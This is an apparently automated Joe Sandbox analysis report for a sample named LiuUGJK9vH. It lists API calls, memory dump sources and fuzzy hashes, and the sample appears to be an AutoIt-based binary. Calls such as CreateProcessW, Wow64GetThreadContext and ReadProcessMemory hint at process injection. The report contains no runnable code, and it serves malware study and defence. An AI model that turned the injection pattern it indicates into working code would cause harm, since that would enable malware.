                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __lock_file_memset
                      • String ID:
                      • API String ID: 26237723-0
                      • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                      • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                      • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                      • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                      APIs
                        • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                      • __lock_file.LIBCMT ref: 004253EB
                        • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                      • __fclose_nolock.LIBCMT ref: 004253F6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                      • String ID:
                      • API String ID: 2800547568-0
                      • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                      • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                      • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                      • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                      APIs
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                        • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$_memmove
                      • String ID:
                      • API String ID: 3033907384-0
                      • Opcode ID: 2bcedb6e7c25340e9e5fe7d5c2723edcefc4ef8b8618a12247d7f771958a4bec
                      • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                      • Opcode Fuzzy Hash: 2bcedb6e7c25340e9e5fe7d5c2723edcefc4ef8b8618a12247d7f771958a4bec
                      • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                      APIs
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02F55D6D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: cd3f42101da440eb02765f8ca7a5319743a5f0aeef779ca030b4d5d9a0f70327
                      • Instruction ID: 9422d56ecadbcc7536c8eda13cfd4d74636aec25c4030765fbd9e686d1afccde
                      • Opcode Fuzzy Hash: cd3f42101da440eb02765f8ca7a5319743a5f0aeef779ca030b4d5d9a0f70327
                      • Instruction Fuzzy Hash: 44F08953E4C330EADD3E1368E95EB71BA5067026ECFCD4546EF435D0B397561856C901
                      APIs
                      • CreateProcessW.KERNEL32(?,00000000), ref: 00BA3A43
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BA3AD9
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00BA3AFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                      • Instruction ID: 8920b7277b071fbd15c7fe95ef803d4dc88790c0690643d67a5f01e45643f6da
                      • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                      • Instruction Fuzzy Hash: 3F12EF24E18658C6EB24DF60D8507DEB272EF68700F1090E9910DEB7A5E77A4F81CF5A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3be41a91f74035c03d55ffe9f4af8568ab814d023375fbdfd06373bddd2e0802
                      • Instruction ID: fc4d80b3df53b7be560474ce7b8333c10ce610c2dc1e4a15ea282b2b5816f22e
                      • Opcode Fuzzy Hash: 3be41a91f74035c03d55ffe9f4af8568ab814d023375fbdfd06373bddd2e0802
                      • Instruction Fuzzy Hash: 2671D322D0C3B08FDB3647288854735BBA4AF426E8FCD4699DFA5CB1A2D3719445C792
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f1471ee549c4365769072be8de9275889442c9684ca64ac1475cfa38fccfc65
                      • Instruction ID: 2d49773f75dd6c9e76722b9e08c524f4cf74b12b855309a226cff4a1f54d4b31
                      • Opcode Fuzzy Hash: 6f1471ee549c4365769072be8de9275889442c9684ca64ac1475cfa38fccfc65
                      • Instruction Fuzzy Hash: 7D619B706002069FDB20DF60C881AABB7E5EF44314F14847EED06A7782D779ED59CB59
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5a372b71ff6f2c02e8093133f0aa5e861951c86041d0aecd2edef0b22227d556
                      • Instruction ID: 6b63161941b3488df7078e909ce163a2a1fa0d71039c57995929c397e8c210d0
                      • Opcode Fuzzy Hash: 5a372b71ff6f2c02e8093133f0aa5e861951c86041d0aecd2edef0b22227d556
                      • Instruction Fuzzy Hash: 4C51D234700604AFDF14EF65C981EAE77A6AF45318F15816EF906AB382DA38ED01CB49
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98aa888ccdfe3fc8845c6902ba5dae90f07c19480d7bf8d5aef18be0e3a96638
                      • Instruction ID: cf7f2cb89fe912a8539fa4e8fcc7cf77aa8addee0623e399a06139506c98ac94
                      • Opcode Fuzzy Hash: 98aa888ccdfe3fc8845c6902ba5dae90f07c19480d7bf8d5aef18be0e3a96638
                      • Instruction Fuzzy Hash: C631C961E0C3708ADF358B28C5443357BBCAF81AD8FC9869ADFB5CA2A6D7758005C752
                      APIs
                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405B96
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                      • Instruction ID: 1b656b166a304b9d337e3dd4d9fe6df5e0790be29ec59920d2bb6ad29cb972c8
                      • Opcode Fuzzy Hash: 0a56fba6add9114e978367d08c36dc312f4c33068dc276e25079fb3dbbe776f4
                      • Instruction Fuzzy Hash: F0315C31A00A09AFDB18DF6DC480A6EB7B5FF48310F14866AD815A3754D774B990CF95
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: d182fd2a8941a7cd94101b3a2aa97755fded6afb6422dcc5fd8f0978a5f28f82
                      • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                      • Opcode Fuzzy Hash: d182fd2a8941a7cd94101b3a2aa97755fded6afb6422dcc5fd8f0978a5f28f82
                      • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 9edd7166449ee7880cecad104d70ab7bad2cead84978e4cb634d2adfce49154d
                      • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                      • Opcode Fuzzy Hash: 9edd7166449ee7880cecad104d70ab7bad2cead84978e4cb634d2adfce49154d
                      • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                      APIs
                        • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                        • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                        • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                        • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Library$Free$Load__wfsopen_memmove
                      • String ID:
                      • API String ID: 1396898556-0
                      • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                      • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                      • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                      • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: f93565b5a1050caf9e0cd63f56fa626170f343c5ddf80ca700b6859ac2ed55ae
                      • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                      • Opcode Fuzzy Hash: f93565b5a1050caf9e0cd63f56fa626170f343c5ddf80ca700b6859ac2ed55ae
                      • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 09e41418d1e9b6219f99264fae2f86dd6bd4a9879c6b4cfad7685436d9da2e65
                      • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                      • Opcode Fuzzy Hash: 09e41418d1e9b6219f99264fae2f86dd6bd4a9879c6b4cfad7685436d9da2e65
                      • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                      APIs
                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                      • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                      • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                      • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 1ad26d4457b191b8deda74aaccd83d0fad23f88d9d00bf4793357419d9a45ef1
                      • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                      • Opcode Fuzzy Hash: 1ad26d4457b191b8deda74aaccd83d0fad23f88d9d00bf4793357419d9a45ef1
                      • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: 91145e022c4d89f4ff38977bcf3824bf8ce2fc8d6f493ee1f87cd9a17569864f
                      • Instruction ID: 471502cfade07fd2614933ff6b9e063a8aa8fd7d98164f54dbe45aa12473a22e
                      • Opcode Fuzzy Hash: 91145e022c4d89f4ff38977bcf3824bf8ce2fc8d6f493ee1f87cd9a17569864f
                      • Instruction Fuzzy Hash: 5D019671D0D3709ED7258B2484143357BF8AF46AD4F89868AEFA5DB1A3D7308504CB52
                      APIs
                      • __lock_file.LIBCMT ref: 004248A6
                        • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2597487223-0
                      • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                      • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                      • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                      • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                      APIs
                      • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                      • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                      • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                      • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                      APIs
                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LongNamePath_memmove
                      • String ID:
                      • API String ID: 2514874351-0
                      • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                      • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                      • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                      • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __fread_nolock
                      • String ID:
                      • API String ID: 2638373210-0
                      • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                      • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                      • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                      • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                      APIs
                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                      • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                      • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                      • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __wfsopen
                      • String ID:
                      • API String ID: 197181222-0
                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                      • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                      • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?), ref: 00441DF0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: PathTemp
                      • String ID:
                      • API String ID: 2920410445-0
                      APIs
                      • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                      Similarity
                      • API ID: ErrorLast
                      • String ID:
                      • API String ID: 1452528299-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                      • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                      • SendMessageW.USER32 ref: 0048CC29
                      • _wcsncpy.LIBCMT ref: 0048CC95
                      • GetKeyState.USER32(00000011), ref: 0048CCB6
                      • GetKeyState.USER32(00000009), ref: 0048CCC3
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                      • GetKeyState.USER32(00000010), ref: 0048CCE3
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                      • SendMessageW.USER32 ref: 0048CD33
                      • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                      • SetCapture.USER32(?), ref: 0048CE69
                      • ClientToScreen.USER32(?,?), ref: 0048CECE
                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                      • ReleaseCapture.USER32 ref: 0048CF00
                      • GetCursorPos.USER32(?), ref: 0048CF3A
                      • ScreenToClient.USER32(?,?), ref: 0048CF47
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                      • SendMessageW.USER32 ref: 0048CFD1
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                      • SendMessageW.USER32 ref: 0048D03D
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                      • GetCursorPos.USER32(?), ref: 0048D08D
                      • ScreenToClient.USER32(?,?), ref: 0048D09A
                      • GetParent.USER32(?), ref: 0048D0BA
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                      • SendMessageW.USER32 ref: 0048D154
                      • ClientToScreen.USER32(?,?), ref: 0048D1B2
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                      • SendMessageW.USER32 ref: 0048D22F
                      • ClientToScreen.USER32(?,?), ref: 0048D281
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
